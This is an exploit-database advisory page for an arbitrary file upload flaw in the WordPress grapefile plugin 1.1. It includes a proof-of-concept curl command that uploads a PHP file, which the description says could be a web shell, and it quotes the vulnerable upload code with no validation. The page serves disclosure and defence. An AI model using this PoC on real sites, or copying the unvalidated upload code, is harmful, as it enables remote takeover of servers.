header-logo
Suggest Exploit
vendor:
Grapefile
by:
Hrvoje Spoljar
9.3
CVSS
HIGH
Arbitrary File Upload
264
CWE
Product Name: Grapefile
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: N/A
CPE: o:wordpress:grapefile:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

WordPress grapefile plugin <= 1.1 Arbitrary file upload

The grapefile plugin version 1.1 for Wordpress is vulnerable to an arbitrary file upload vulnerability. This vulnerability allows an attacker to upload malicious files to the server, such as a web shell, which can be used to gain remote access to the server. The vulnerability exists due to the lack of proper input validation in the grapeupload.php, grapeupload2.php, grapeupload3.php, and grapeupload4.php files. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request containing a malicious file to the vulnerable server.

Mitigation:

Upgrade to the latest version of the grapefile plugin.
Source

Exploit-DB raw data:

Title: Wordpress grapefile plugin <= 1.1 Arbitrary file upload
Date: 30-8-2011
Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ]
Version: 1.1
Software link:http://wordpress.org/extend/plugins/grapefile/

PoC:
curl -F "userfile=@mycode.php"
http://domain.tld/wp-content/plugins/grapefile/grapeupload.php

File(s): grapeupload.php  grapeupload2.php  grapeupload3.php
grapeupload4.php
Vulnerable code:
$uploaddir =
$_SERVER["DOCUMENT_ROOT"].'/wp-content/plugins/grapefile/filestore/avi/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
  echo "success";

Navigation

Suggest Exploit

Services By CQR